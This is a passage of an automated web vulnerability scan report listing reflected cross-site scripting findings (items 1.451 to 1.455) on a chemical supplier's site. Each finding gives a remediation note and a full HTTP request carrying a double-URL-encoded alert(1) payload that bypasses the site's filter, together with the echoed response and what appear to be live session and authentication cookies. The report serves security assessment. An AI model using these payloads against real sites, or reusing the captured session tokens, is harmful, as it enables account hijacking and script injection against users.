bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:32 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc30a98";alert(1)//3d567e605d9/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news","E404") ;
   </script>
...[SNIP]...

1.451. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a947e%2522%253balert%25281%2529%252f%252fe44c3cc3156 was submitted in the REST URL parameter 2. This input was echoed as a947e";alert(1)//e44c3cc3156 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialiba947e%2522%253balert%25281%2529%252f%252fe44c3cc3156/sigma-aldrich/images/news-thumbnails/oligonucleotide-news HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialiba947e";alert(1)//e44c3cc3156/sigma-aldrich/images/news-thumbnails/oligonucleotide-news","E404") ;
   </script>
...[SNIP]...

1.452. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 415e6%2522%253balert%25281%2529%252f%252fce7e2d95faa was submitted in the REST URL parameter 3. This input was echoed as 415e6";alert(1)//ce7e2d95faa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich415e6%2522%253balert%25281%2529%252f%252fce7e2d95faa/images/news-thumbnails/oligonucleotide-news HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:36 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich415e6";alert(1)//ce7e2d95faa/images/news-thumbnails/oligonucleotide-news","E404") ;
   </script>
...[SNIP]...

1.453. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d92ed%2522%253balert%25281%2529%252f%252fd213f7ad767 was submitted in the REST URL parameter 4. This input was echoed as d92ed";alert(1)//d213f7ad767 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/imagesd92ed%2522%253balert%25281%2529%252f%252fd213f7ad767/news-thumbnails/oligonucleotide-news HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:38 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/imagesd92ed";alert(1)//d213f7ad767/news-thumbnails/oligonucleotide-news","E404") ;
   </script>
...[SNIP]...

1.454. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a09a%2522%253balert%25281%2529%252f%252f7192f6b2c23 was submitted in the REST URL parameter 5. This input was echoed as 3a09a";alert(1)//7192f6b2c23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/news-thumbnails3a09a%2522%253balert%25281%2529%252f%252f7192f6b2c23/oligonucleotide-news HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:40 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/news-thumbnails3a09a";alert(1)//7192f6b2c23/oligonucleotide-news","E404") ;
   </script>
...[SNIP]...

1.455. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5afdd%2522%253balert%25281%2529%252f%252f7f530c62bdf was submitted in the REST URL parameter 6. This input was echoed as 5afdd";alert(1)//7f530c62bdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/news-thumbnails/oligonucleotide-news5afdd%2522%253balert%25281%2529%252f%252f7f530c62bdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
